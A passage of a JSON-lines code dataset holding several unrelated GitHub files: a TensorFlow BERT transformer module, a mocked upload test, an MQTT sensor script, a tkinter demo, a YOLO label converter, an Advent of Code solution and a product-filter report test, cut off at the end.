TypeError(\"Unable to build `Dense3D` layer with non-floating \"\n \"point (and non-complex) dtype %s\" % (dtype,))\n input_shape = tf.TensorShape(input_shape)\n if tf.compat.dimension_value(input_shape[-1]) is None:\n raise ValueError(\"The last dimension of the inputs to `Dense3D` \"\n \"should be defined. Found `None`.\")\n self.last_dim = tf.compat.dimension_value(input_shape[-1])\n self.input_spec = tf.keras.layers.InputSpec(\n min_ndim=3, axes={-1: self.last_dim})\n # Determines variable shapes.\n if self.backward_compatible:\n kernel_shape = self.compatible_kernel_shape\n bias_shape = self.compatible_bias_shape\n else:\n kernel_shape = self.kernel_shape\n bias_shape = self.bias_shape\n\n self.kernel = self.add_weight(\n \"kernel\",\n shape=kernel_shape,\n initializer=self.kernel_initializer,\n dtype=self.dtype,\n trainable=True)\n if self.use_bias:\n self.bias = self.add_weight(\n \"bias\",\n shape=bias_shape,\n initializer=self.bias_initializer,\n dtype=self.dtype,\n trainable=True)\n else:\n self.bias = None\n super(Dense3D, self).build(input_shape)\n\n def call(self, inputs):\n if self.backward_compatible:\n kernel = tf.keras.backend.reshape(self.kernel, self.kernel_shape)\n bias = (tf.keras.backend.reshape(self.bias, self.bias_shape)\n if self.use_bias else None)\n else:\n kernel = self.kernel\n bias = self.bias\n\n if self.output_projection:\n ret = tf.einsum(\"abcd,cde->abe\", inputs, kernel)\n else:\n ret = tf.einsum(\"abc,cde->abde\", inputs, kernel)\n if self.use_bias:\n ret += bias\n if self.activation is not None:\n return self.activation(ret)\n return ret\n\n\nclass Dense2DProjection(tf.keras.layers.Layer):\n\n def __init__(self,\n output_size,\n kernel_initializer=None,\n bias_initializer=\"zeros\",\n activation=None,\n fp32_activation=False,\n **kwargs):\n super(Dense2DProjection, self).__init__(**kwargs)\n self.output_size = output_size\n self.kernel_initializer = kernel_initializer\n self.bias_initializer = bias_initializer\n self.activation = activation\n self.fp32_activation = fp32_activation\n\n def build(self, input_shape):\n \"\"\"Implements build() for the layer.\"\"\"\n dtype = tf.as_dtype(self.dtype or tf.keras.backend.floatx())\n if not (dtype.is_floating or dtype.is_complex):\n raise TypeError(\"Unable to build `Dense2DProjection` layer with \"\n \"non-floating point (and non-complex) \"\n \"dtype %s\" % (dtype,))\n input_shape = tf.TensorShape(input_shape)\n if tf.compat.dimension_value(input_shape[-1]) is None:\n raise ValueError(\"The last dimension of the inputs to \"\n \"`Dense2DProjection` should be defined. \"\n \"Found `None`.\")\n last_dim = tf.compat.dimension_value(input_shape[-1])\n self.input_spec = tf.keras.layers.InputSpec(min_ndim=3, axes={-1: last_dim})\n self.kernel = self.add_weight(\n \"kernel\",\n shape=[last_dim, self.output_size],\n initializer=self.kernel_initializer,\n dtype=self.dtype,\n trainable=True)\n self.bias = self.add_weight(\n \"bias\",\n shape=[self.output_size],\n initializer=self.bias_initializer,\n dtype=self.dtype,\n trainable=True)\n super(Dense2DProjection, self).build(input_shape)\n\n def call(self, inputs):\n ret = tf.einsum(\"abc,cd->abd\", inputs, self.kernel)\n ret += self.bias\n if self.activation is not None:\n if self.dtype == tf.float16 and self.fp32_activation:\n ret = tf.cast(ret, tf.float32)\n return self.activation(ret)\n return ret\n\n\nclass TransformerBlock(tf.keras.layers.Layer):\n def __init__(self,\n hidden_size=768,\n num_attention_heads=12,\n intermediate_size=3072,\n intermediate_activation=\"gelu\",\n hidden_dropout_prob=0.0,\n attention_probs_dropout_prob=0.0,\n initializer_range=0.02,\n backward_compatible=False,\n float_type=tf.float32,\n **kwargs):\n super(TransformerBlock, self).__init__(**kwargs)\n self.hidden_size = hidden_size\n self.num_attention_heads = num_attention_heads\n self.intermediate_size = intermediate_size\n self.intermediate_activation = tf_utils.get_activation(\n intermediate_activation)\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.initializer_range = initializer_range\n self.backward_compatible = backward_compatible\n self.float_type = float_type\n\n if self.hidden_size % self.num_attention_heads != 0:\n raise ValueError(\n \"The hidden size (%d) is not a multiple of the number of attention \"\n \"heads (%d)\" % (self.hidden_size, self.num_attention_heads))\n self.attention_head_size = int(self.hidden_size / self.num_attention_heads)\n\n def build(self, unused_input_shapes):\n \"\"\"Implements build() for the layer.\"\"\"\n self.attention_layer = Attention(\n num_attention_heads=self.num_attention_heads,\n size_per_head=self.attention_head_size,\n attention_probs_dropout_prob=self.attention_probs_dropout_prob,\n initializer_range=self.initializer_range,\n backward_compatible=self.backward_compatible,\n name=\"self_attention\")\n self.attention_output_dense = Dense3D(\n num_attention_heads=self.num_attention_heads,\n size_per_head=int(self.hidden_size / self.num_attention_heads),\n kernel_initializer=get_initializer(self.initializer_range),\n output_projection=True,\n backward_compatible=self.backward_compatible,\n name=\"self_attention_output\")\n self.attention_dropout = tf.keras.layers.Dropout(\n rate=self.hidden_dropout_prob)\n self.attention_layer_norm = (\n tf.keras.layers.LayerNormalization(\n name=\"self_attention_layer_norm\", axis=-1, epsilon=1e-12,\n # We do layer norm in float32 for numeric stability.\n dtype=tf.float32))\n self.intermediate_dense = Dense2DProjection(\n output_size=self.intermediate_size,\n kernel_initializer=get_initializer(self.initializer_range),\n activation=self.intermediate_activation,\n # Uses float32 so that gelu activation is done in float32.\n fp32_activation=True,\n name=\"intermediate\")\n self.output_dense = Dense2DProjection(\n output_size=self.hidden_size,\n kernel_initializer=get_initializer(self.initializer_range),\n name=\"output\")\n self.output_dropout = tf.keras.layers.Dropout(rate=self.hidden_dropout_prob)\n self.output_layer_norm = tf.keras.layers.LayerNormalization(\n name=\"output_layer_norm\", axis=-1, epsilon=1e-12, dtype=tf.float32)\n super(TransformerBlock, self).build(unused_input_shapes)\n\n def common_layers(self):\n \"\"\"Explicitly gets all layer objects inside a Transformer encoder block.\"\"\"\n return [\n self.attention_layer, self.attention_output_dense,\n self.attention_dropout, self.attention_layer_norm,\n self.intermediate_dense, self.output_dense, self.output_dropout,\n self.output_layer_norm\n ]\n\n def __call__(self, input_tensor, attention_mask=None, **kwargs):\n inputs = tf_utils.pack_inputs([input_tensor, attention_mask])\n return super(TransformerBlock, self).__call__(inputs, **kwargs)\n\n def call(self, inputs, **kwargs):\n \"\"\"Implements call() for the layer.\"\"\"\n (input_tensor, attention_mask) = tf_utils.unpack_inputs(inputs)\n attention_output = self.attention_layer(\n from_tensor=input_tensor,\n to_tensor=input_tensor,\n attention_mask=attention_mask,**kwargs)\n attention_output = self.attention_output_dense(attention_output)\n attention_output = self.attention_dropout(attention_output,training=kwargs.get('training', False))\n # Use float32 in keras layer norm and the gelu activation in the\n # intermediate dense layer for numeric stability\n attention_output = self.attention_layer_norm(input_tensor +\n attention_output)\n if self.float_type == tf.float16:\n attention_output = tf.cast(attention_output, tf.float16)\n intermediate_output = self.intermediate_dense(attention_output)\n if self.float_type == tf.float16:\n intermediate_output = tf.cast(intermediate_output, tf.float16)\n layer_output = self.output_dense(intermediate_output)\n layer_output = self.output_dropout(layer_output,training=kwargs.get('training', False))\n # Use float32 in keras layer norm for numeric stability\n layer_output = self.output_layer_norm(layer_output + attention_output)\n if self.float_type == tf.float16:\n layer_output = tf.cast(layer_output, tf.float16)\n return layer_output\n\n\nclass Transformer(tf.keras.layers.Layer):\n\n def __init__(self,\n num_hidden_layers=12,\n hidden_size=768,\n num_attention_heads=12,\n intermediate_size=3072,\n intermediate_activation=\"gelu\",\n hidden_dropout_prob=0.0,\n attention_probs_dropout_prob=0.0,\n initializer_range=0.02,\n backward_compatible=False,\n float_type=tf.float32,\n **kwargs):\n super(Transformer, self).__init__(**kwargs)\n self.num_hidden_layers = num_hidden_layers\n self.hidden_size = hidden_size\n self.num_attention_heads = num_attention_heads\n self.intermediate_size = intermediate_size\n self.intermediate_activation = tf_utils.get_activation(\n intermediate_activation)\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.initializer_range = initializer_range\n self.backward_compatible = backward_compatible\n self.float_type = float_type\n\n def build(self, unused_input_shapes):\n \"\"\"Implements build() for the layer.\"\"\"\n self.layers = []\n for i in range(self.num_hidden_layers):\n self.layers.append(\n TransformerBlock(\n hidden_size=self.hidden_size,\n num_attention_heads=self.num_attention_heads,\n intermediate_size=self.intermediate_size,\n intermediate_activation=self.intermediate_activation,\n hidden_dropout_prob=self.hidden_dropout_prob,\n attention_probs_dropout_prob=self.attention_probs_dropout_prob,\n initializer_range=self.initializer_range,\n backward_compatible=self.backward_compatible,\n float_type=self.float_type,\n name=(\"layer_%d\" % i)))\n super(Transformer, self).build(unused_input_shapes)\n\n def __call__(self, input_tensor, attention_mask=None, **kwargs):\n inputs = tf_utils.pack_inputs([input_tensor, attention_mask])\n return super(Transformer, self).__call__(inputs=inputs, **kwargs)\n\n def call(self, inputs, return_all_layers=False, **kwargs):\n unpacked_inputs = tf_utils.unpack_inputs(inputs)\n input_tensor = unpacked_inputs[0]\n attention_mask = unpacked_inputs[1]\n output_tensor = input_tensor\n\n all_layer_outputs = []\n for layer in self.layers:\n output_tensor = layer(output_tensor, attention_mask,**kwargs)\n all_layer_outputs.append(output_tensor)\n\n if return_all_layers:\n return all_layer_outputs\n\n return all_layer_outputs[-1]\n\n\ndef get_initializer(initializer_range=0.02):\n return tf.keras.initializers.TruncatedNormal(stddev=initializer_range)\n\n\ndef create_attention_mask_from_input_mask(from_tensor, to_mask):\n from_shape = tf_utils.get_shape_list(from_tensor, expected_rank=[2, 3])\n batch_size = from_shape[0]\n from_seq_length = from_shape[1]\n\n to_shape = tf_utils.get_shape_list(to_mask, expected_rank=2)\n to_seq_length = to_shape[1]\n\n to_mask = tf.cast(\n tf.reshape(to_mask, [batch_size, 1, to_seq_length]),\n dtype=from_tensor.dtype)\n\n broadcast_ones = tf.ones(\n shape=[batch_size, from_seq_length, 1], dtype=from_tensor.dtype)\n\n mask = broadcast_ones * to_mask\n\n return mask\n","repo_name":"imgcook/pipcook-plugin-tensorflow-bert-ner-model","sub_path":"bert_ner_define/bert_modeling.py","file_name":"bert_modeling.py","file_ext":"py","file_size_in_byte":27334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"52378809","text":"from unittest.mock import patch\n\nfrom search.metrics.ccc.ccc_lib.dt_client import DTClient\nfrom search.metrics.ccc.ccc_lib.ccc import CCC\nfrom search.metrics.ccc.ccc_lib.model import CompareTwoRequest\nfrom search.metrics.ccc.ccc_lib.calculators.diff_calculator import DiffResult\n\n\ndef test_upload():\n with patch(\"yt.wrapper.insert_rows\") as yt_mock:\n observation = CCC.create_observation(\n CompareTwoRequest(\n left_serpset_id=-1,\n right_serpset_id=-2,\n left_metric_name=\"onlySearchResult.judged-pfound\",\n right_metric_name=\"onlySearchResult.judged-pfound\",\n type=\"intersected\",\n ),\n DiffResult(\"intersected\", True, None, 1, 1, 1, 11, 1, 1, 1, 0.5),\n )\n tables = {\n DTClient.SERPSET_QUERIES_TABLE: \"//home/metrics/ytcompare/develop/serpset_queries\",\n DTClient.SERP_METRICS_TABLE: \"//home/metrics/ytcompare/develop/serp_query_metrics\",\n DTClient.OBSERVATIONS_TABLE: \"//home/metrics/ytcompare/develop/observations\",\n }\n DTClient(tables, yt_token=\"meow-meow\").upload_observation(observation)\n assert yt_mock.call_count == 1\n first_call = yt_mock.call_args_list[0]\n assert first_call[0][0] == \"//home/metrics/ytcompare/develop/observations\"\n assert first_call[0][1] == [observation]\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/tests/dt_client_tests.py","file_name":"dt_client_tests.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28633107041","text":"\r\nfrom paho.mqtt.client import Client\r\n\r\nTEMP_TOPIC = \"temperature\"\r\nHUMIDITY_TOPIC = \"humidity\"\r\n\r\ndef on_message(mqttc, data, msg):\r\n print(f\"Received message: {msg.topic}:{msg.payload}:{data}\")\r\n if data[\"status\"] == 0:\r\n temp = int(msg.payload) \r\n if temp > data[\"temp_threshold\"]:\r\n print(f\"Temperature threshold exceeded ({temp}), subscribing to humidity topic\")\r\n mqttc.subscribe(HUMIDITY_TOPIC)\r\n data[\"status\"] = 1\r\n elif data[\"status\"] == 1:\r\n if msg.topic == HUMIDITY_TOPIC:\r\n humidity = int(msg.payload)\r\n if humidity > data[\"humidity_threshold\"]:\r\n print(f\"Humidity threshold exceeded ({humidity}), cancelling subscription to humidity topic\")\r\n mqttc.unsubscribe(HUMIDITY_TOPIC) \r\n data[\"status\"] = 0\r\n elif TEMP_TOPIC in msg.topic:\r\n temp = int(msg.payload)\r\n if temp <= data[\"temp_threshold\"]:\r\n print(f\"Temperature ({temp}) is below the threshold, cancelling subscription to humidity topic\")\r\n data[\"status\"] = 0\r\n mqttc.unsubscribe(HUMIDITY_TOPIC)\r\n \r\ndef on_log(mqttc, data, level, buf):\r\n print(f\"LOG: {data}:{buf}\")\r\n \r\ndef main(broker):\r\n data = {\"temp_threshold\": 20,\r\n \"humidity_threshold\": 80,\r\n \"status\": 0}\r\n mqttc = Client(userdata=data)\r\n mqttc.on_message = on_message\r\n mqttc.enable_logger()\r\n mqttc.connect(broker)\r\n mqttc.subscribe(f\"{TEMP_TOPIC}/t1\")\r\n mqttc.loop_forever()\r\n \r\nif __name__ == \"__main__\":\r\n import sys\r\n if len(sys.argv) < 2:\r\n print(f\"Usage: {sys.argv[0]} broker\")\r\n sys.exit(1)\r\n broker = sys.argv[1]\r\n main(broker)","repo_name":"jamart25/mqtt","sub_path":"Temperature_Humidity.py","file_name":"Temperature_Humidity.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22128063046","text":"from tkinter import *\nroot=Tk()\nroot.title(\"subhadeep chell\")\nroot.geometry(\"664x434\")\nroot.minsize(200,100)\nroot.maxsize(1200,988)\nx=Label(text=\"my name is subhadeep chell\")\nx.pack()\nx=Label(text=\"i read in class XII\")\nx.pack()\nx=Label(text=\"bhojpuri classics\")\nx.pack()\nroot.mainloop()\n","repo_name":"SHERLOCKx90/Python-Programming","sub_path":"tkinter.py","file_name":"tkinter.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39069521645","text":"import os\nimport cv2\n\nyolo_txt = r\"/home/os/window_share/ganhaiyang/Alg_Proj/Detect_Proj/yolov3/runs/detect/exp26/labels\"\n\noutput_path = r\"/home/os/window_share/ganhaiyang/Alg_Proj/2.2.0_20201117_042200/QK_AI_Train_performance/test_tool/coco/norm_hand_labels\"\nos.makedirs(output_path, exist_ok=True)\nimage_path = r\"/home/os/window_share/ganhaiyang/Alg_Proj/Detect_Proj/yolov3/data/val/val_2017coco\"\n\nyolo_list = os.listdir(yolo_txt)\n\n# class_name = [\"person\",\"ele_cap\",\"protection_shoes\", \"shoes\"]\nclass_name = [ 'person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'trafficlight',\n 'firehydrant', 'stopsign', 'parkingmeter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',\n 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',\n 'skis', 'snowboard', 'sportsball', 'kite', 'baseballbat', 'baseballglove', 'skateboard', 'surfboard',\n 'tennisracket', 'bottle', 'wineglass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hotdog', 'pizza', 'donut', 'cake', 'chair', 'couch',\n 'pottedplant', 'bed', 'diningtable', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cellphone',\n 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors', 'teddybear',\n 'hairdrier', 'toothbrush' ]\n\nfor txt in yolo_list:\n txt_path = os.path.join(yolo_txt,txt)\n output_txt_path = os.path.join(output_path,txt)\n image_read_path = os.path.join(image_path,txt.split(\".txt\")[0]+\".jpg\") #.png\n\n read_handle = open(txt_path,\"r\")\n write_handle = open(output_txt_path,\"w\")\n\n if os.path.exists(image_read_path):\n pass\n else:\n image_read_path = image_read_path.replace(\".jpg\",\".png\")\n print(image_read_path)\n h,w,_ = cv2.imread(image_read_path).shape\n for content in read_handle:\n if \"\\t\" in content:\n content = content.replace(\"\\t\",\" \")\n content_list = content.split(\" \")\n # print()\n dw = 1. / w\n dh = 1. / h\n # name = class_name[int(content_list[0])]\n\n # ## xyxy -> yolo normal(xywh)\n # name = int(content_list[0])\n name = 1\n # center_x = float(int(content_list[1]) + int(content_list[3]))*dw/2\n # center_y = float(int(content_list[2]) + int(content_list[4]))*dh/2\n # box_w = float(abs(int(content_list[3]) - int(content_list[1])))*dw\n # box_h = float(abs(int(content_list[4]) - int(content_list[2])))*dh\n center_x = float(int(content_list[3]) + int(content_list[5]))*dw/2\n center_y = float(int(content_list[4]) + int(content_list[6]))*dh/2\n box_w = float(abs(int(content_list[5]) - int(content_list[3])))*dw\n box_h = float(abs(int(content_list[6]) - int(content_list[4])))*dh\n\n # top_x = float(int(content_list[1]))*w - float(int(content_list[3]))*w/2\n # top_y = float(int(content_list[2]))*h - float(int(content_list[4][:-3]))*h/2\n # bot_x = float(int(content_list[1]))*w + float(int(content_list[3]))*w/2\n # bot_y = float(int(content_list[2]))*h + float(int(content_list[4][:-3]))*h/2\n\n # yolo normal(xywh) -> xyxy\n # bbox_width = float(content_list[3]) * w\n # bbox_height = float(content_list[4]) * h\n # center_x = float(content_list[1]) * w\n # center_y = float(content_list[2]) * h\n # top_x = center_x - (bbox_width / 2)\n # top_y = center_y - (bbox_height / 2)\n # bot_x = center_x + (bbox_width / 2)\n # bot_y = center_y + (bbox_height / 2)\n\n write_handle.write(str(name) +\" \"+str(center_x)+\" \"+str(center_y)+\" \"+str(box_w)+\" \"+str(box_h)+\"\\n\")\n # write_handle.write(name+\" \"+str(int(top_x))+\" \"+str(int(top_y))+\" \"+str(int(bot_x))+\" \"+str(int(bot_y))+\"\\n\")\n write_handle.close()","repo_name":"Morgan-Gan/Get_datasets","sub_path":"yolo2gt.py","file_name":"yolo2gt.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39257996312","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nmax_correctness = 0.6\n# Calculate for what sequence length 99% of random sequences have correctness under max_correctness\ndef calc_deviation(n):\n return 1 / (2 * np.sqrt(n))\n\ndef calc_percent(n):\n dev = calc_deviation(n)\n f = lambda x: (1 / (dev * np.sqrt(2 * np.pi))) * np.exp((-1/2) * ((x - 0.5) / dev)**2)\n x = np.linspace(0,max_correctness,1000)\n return (np.trapz(f(x), x)) * 100\n\nx = []\ny = []\nfound = False\nfor i in range(1,300):\n x.append(i)\n y.append(calc_percent(i))\n if not found and y[-1] >= 99:\n found = True\n print(\"Minsta längd där 99% av sekvenser har korrekthet under \" + str(max_correctness * 100) + \"%: \" + str(x[-1]))\n \nplt.plot(x, y)\nplt.plot(x, y)\nplt.ylabel('Andel (%) av slumpmässiga sekvenser med korrekthet under ' + str(max_correctness * 100) + '%')\nplt.xlabel('Sekvenslängd')\nplt.show()","repo_name":"AliceC-7504/0_eller_1","sub_path":"normal_distr.py","file_name":"normal_distr.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"512627049","text":"from collections import defaultdict\n\nfrom days import AOCDay, day\n\n\n@day(5)\nclass Day5(AOCDay):\n print_debug = \"c12\"\n test_input = \"\"\"0,9 -> 5,9\n8,0 -> 0,8\n9,4 -> 3,4\n2,2 -> 2,1\n7,0 -> 7,4\n6,4 -> 2,0\n0,9 -> 2,9\n3,4 -> 1,4\n0,0 -> 8,8\n5,5 -> 8,2\"\"\".split(\"\\n\")\n lines = []\n grid = defaultdict(int)\n\n def common(self, input_data):\n self.lines = []\n self.grid = defaultdict(int)\n for line in input_data:\n line = line.split(\" -> \")\n start = list(map(int, line[0].split(\",\")))\n end = list(map(int, line[1].split(\",\")))\n self.lines.append((start, end))\n\n def print_grid(self, size=10):\n for y in range(size):\n for x in range(size):\n print(self.grid[(x, y)] if self.grid[(x, y)] != 0 else \".\", end=\"\")\n print(\"\")\n\n def part1(self, input_data):\n # Only consider vertical/horizontal lines\n self.lines = list(filter(lambda x: x[0][0] == x[1][0] or x[0][1] == x[1][1], self.lines))\n for start, end in self.lines:\n # Vertical lines\n if start[0] == end[0]:\n order = sorted([start[1], end[1]])\n for i in range(order[0], order[1] + 1):\n self.grid[(start[0], i)] += 1\n # Horizontal lines\n elif start[1] == end[1]:\n order = sorted([start[0], end[0]])\n for i in range(order[0], order[1] + 1):\n self.grid[(i, start[1])] += 1\n yield len([x for x in self.grid.values() if x > 1])\n\n def part2(self, input_data):\n for start, end in self.lines:\n # Vertical lines\n if start[0] == end[0]:\n order = sorted([start[1], end[1]])\n for i in range(order[0], order[1] + 1):\n self.grid[(start[0], i)] += 1\n # Horizontal lines\n elif start[1] == end[1]:\n order = sorted([start[0], end[0]])\n for i in range(order[0], order[1] + 1):\n self.grid[(i, start[1])] += 1\n # Diagonal lines\n else:\n x = start[0]\n y = start[1]\n self.grid[(x, y)] += 1\n while x != end[0] and y != end[1]:\n if start[0] < end[0]:\n x += 1\n else:\n x -= 1\n if start[1] < end[1]:\n y += 1\n else:\n y -= 1\n self.grid[(x, y)] += 1\n yield len([x for x in self.grid.values() if x > 1])\n","repo_name":"Kurocon/AdventOfCode2021","sub_path":"days/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"186139059","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.types import GLParam, GLType, GLValue, Model, Offer, VCluster\nfrom core.testcase import TestCase, main\nfrom core.matcher import Absent\n\n\nclass T(TestCase):\n @classmethod\n def prepare_format(cls):\n \"\"\"\n Создаем один оффер с одним и тем же размером из трех размерных сеток -- итого 3 параметра\n Описываем размеры и размерные сетки\n \"\"\"\n cls.settings.default_search_experiment_flags += ['market_filter_offers_with_model_without_sku=0']\n\n cls.index.gltypes += [\n GLType(\n param_id=201,\n hid=101,\n gltype=GLType.ENUM,\n subtype='size',\n cluster_filter=True,\n unit_param_id=202,\n name='size',\n values=[\n GLValue(value_id=1, text='32', unit_value_id=2),\n GLValue(value_id=2, text='34', unit_value_id=2, filter_value_red=False),\n GLValue(value_id=3, text='L', unit_value_id=1),\n GLValue(value_id=4, text='XL', unit_value_id=1),\n GLValue(value_id=5, text='Tumba', unit_value_id=3, filter_value=False),\n GLValue(value_id=6, text='Yumba', unit_value_id=3, filter_value=False),\n GLValue(value_id=7, text='9', unit_value_id=4),\n GLValue(value_id=8, text='9.5', unit_value_id=4),\n ],\n ),\n GLType(\n param_id=202,\n hid=101,\n gltype=GLType.ENUM,\n name='size_units',\n positionless=True,\n values=[\n GLValue(value_id=1, text='INT', filter_value_red=False),\n GLValue(value_id=2, text='RU', default=True),\n GLValue(value_id=3, text='African'),\n GLValue(value_id=4, text='US', default_red=True),\n ],\n ),\n ]\n\n cls.index.offers += [\n Offer(\n title='boots',\n hid=101,\n vclusterid=1000000001,\n glparams=[\n GLParam(param_id=201, value=2),\n GLParam(param_id=201, value=4),\n GLParam(param_id=201, value=6),\n ],\n ),\n ]\n\n cls.index.vclusters += [VCluster(title='boots', hid=101, vclusterid=1000000001)]\n\n def test_format_json(self):\n \"\"\"\n Фиксируем json-формат глобальных и локальных фильтров\n Должен быть такой же, как и при выдаче старых размеров, кроме:\n - в глобальных параметрах отображаются только параметры с флажком filter_value=\"true\" (gl_mbo.pbuf.sn)\n - в локальных параметрах отображаются все параметры (здесь: из сетки African)\n \"\"\"\n expected_global_filters = {\n 'search': {},\n 'filters': [\n {\n 'id': '201',\n 'type': 'enum',\n 'name': 'size',\n 'subType': 'size',\n 'kind': 2,\n 'position': 1,\n 'noffers': 1,\n 'defaultUnit': 'RU',\n 'units': [\n {\n 'values': [{'initialFound': 1, 'unit': 'INT', 'found': 1, 'value': \"XL\", 'id': \"4\"}],\n 'unitId': 'INT',\n 'id': '1',\n },\n {\n 'values': [{'initialFound': 1, 'unit': 'RU', 'found': 1, 'value': '34', 'id': '2'}],\n 'unitId': 'RU',\n 'id': '2',\n },\n ],\n }\n ],\n }\n\n unexpected_unit_filters = {'filters': [{'id': '202'}]}\n\n expected_product_filters = {\n 'entity': 'product',\n 'filters': [\n {\n 'id': '201',\n 'type': 'enum',\n 'name': 'size',\n 'subType': 'size',\n 'kind': 2,\n 'position': 1,\n 'noffers': 1,\n 'defaultUnit': 'RU',\n 'units': [\n {\n 'values': [{'initialFound': 1, 'unit': 'INT', 'found': 1, 'value': \"XL\", 'id': \"4\"}],\n 'unitId': 'INT',\n 'id': '1',\n },\n {\n 'values': [{'initialFound': 1, 'unit': 'RU', 'found': 1, 'value': '34', 'id': '2'}],\n 'unitId': 'RU',\n 'id': '2',\n },\n ],\n }\n ],\n }\n\n expected_offer_filters = {\n 'entity': 'offer',\n 'filters': [\n {\n 'id': '201',\n 'type': 'enum',\n 'name': 'size',\n 'subType': 'size',\n 'kind': 2,\n 'position': 1,\n 'noffers': 1,\n 'defaultUnit': 'RU',\n 'units': [\n {\n 'values': [{'initialFound': 1, 'unit': 'African', 'found': 1, 'value': 'Yumba', 'id': '6'}],\n 'unitId': 'African',\n 'id': '3',\n },\n {\n 'values': [{'initialFound': 1, 'unit': 'INT', 'found': 1, 'value': 'XL', 'id': '4'}],\n 'unitId': 'INT',\n 'id': '1',\n },\n {\n 'values': [{'initialFound': 1, 'unit': 'RU', 'found': 1, 'value': '34', 'id': '2'}],\n 'unitId': 'RU',\n 'id': '2',\n },\n ],\n }\n ],\n }\n\n response = self.report.request_json('place=prime&text=boots&hid=101')\n self.assertFragmentIn(response, expected_global_filters)\n self.assertFragmentIn(response, expected_offer_filters, allow_different_len=False)\n self.assertFragmentIn(response, expected_product_filters, allow_different_len=False)\n\n # проверяем, что параметр сетки не отдается фронту\n self.assertFragmentNotIn(response, unexpected_unit_filters)\n\n response = self.report.request_json('place=productoffers&hid=101&hyperid=1000000001')\n self.assertFragmentIn(response, expected_global_filters)\n self.assertFragmentIn(response, expected_offer_filters, allow_different_len=False)\n\n # проверяем, что параметр сетки не отдается фронту\n self.assertFragmentNotIn(response, unexpected_unit_filters)\n\n def test_format_xml(self):\n \"\"\"\n Фиксируем xml-формат глобальных и локальных фильтров\n Должен быть такой же, как и при выдаче старых размеров, кроме:\n - в глобальных параметрах отображаются только параметры с флажком filter_value=\"true\" (gl_mbo.pbuf.sn)\n - в локальных параметрах отображаются все параметры (здесь: из сетки African)\n\n Важно! Для place=visual на текущий момент нельзя протестировать локальные параметры кластера (!), т.к. они\n опираются на региональные статистики по фильтрам, которые не реализованы в лайте и не будут, т.к. place=visual\n умирает. Лишний параметр там появиться не может, т.к. там рисуется то, что есть в статистике.\n \"\"\"\n expected_global_filters = '''\n \n \n \n \n \n \n '''\n\n _ = ''\n\n _ = '''\n \n \n \n \n \n \n \n \n \n '''\n requests = ['place=modelinfo&hid=101&hyperid=1000000001&rids=0']\n\n for request in requests:\n response = self.report.request_xml(request)\n self.assertFragmentIn(response, expected_global_filters, allow_different_len=False)\n\n self.error_log.ignore(\n \"can not parse yandexmarket cookie's shows on page(bad lexical cast: source type value could not be interpreted as target)\"\n )\n\n @classmethod\n def prepare_value_order(cls):\n \"\"\"\n Создаем гуру-лайт енум параметр, в значениях указываем порядок их отображения на фронте\n (диапазон может быть не непрерывным)\n Создаем другой гуру-лайт енум параметр, в значениях которого указываем порядок, но в последнем значении \"забываем\"\n Создаем сетки: интернациональную, римскую, текстовую\n Создаем оффер с двумя параметрами, описывающими его размер\n Создаем оффер с параметром из текстовой сетки\n \"\"\"\n cls.index.gltypes += [\n GLType(\n param_id=205,\n hid=102,\n gltype=GLType.ENUM,\n subtype='size',\n cluster_filter=True,\n unit_param_id=206,\n name='size',\n values=[\n GLValue(value_id=5, text='XS', unit_value_id=1, position=2),\n GLValue(value_id=6, text='XL', unit_value_id=1, position=6),\n GLValue(value_id=7, text='L', unit_value_id=1, position=4),\n GLValue(value_id=8, text='M', unit_value_id=1, position=3),\n GLValue(value_id=9, text='I', unit_value_id=2, position=1),\n GLValue(value_id=10, text='IC', unit_value_id=2, position=99),\n GLValue(value_id=11, text='V', unit_value_id=2, position=5),\n GLValue(value_id=12, text='C', unit_value_id=2, position=100),\n ],\n ),\n GLType(\n param_id=207,\n hid=102,\n gltype=GLType.ENUM,\n subtype='size',\n cluster_filter=True,\n unit_param_id=206,\n name='text-size',\n values=[\n GLValue(value_id=1, text='aaa', unit_value_id=3, position=4),\n GLValue(value_id=2, text='bbb', unit_value_id=3, position=3),\n GLValue(value_id=3, text='ccc', unit_value_id=3, position=2),\n GLValue(value_id=4, text='ddd', unit_value_id=3, position=None), # position is absent\n ],\n ),\n GLType(\n param_id=206,\n hid=102,\n gltype=GLType.ENUM,\n name='size_units',\n position=None,\n values=[\n GLValue(value_id=1, text='INT'),\n GLValue(value_id=2, text='ROMAN'),\n GLValue(value_id=3, text='TEXT'),\n ],\n ),\n ]\n\n cls.index.offers += [\n Offer(\n title='shoes',\n hid=102,\n hyperid=601,\n glparams=[\n GLParam(param_id=205, value=5),\n GLParam(param_id=205, 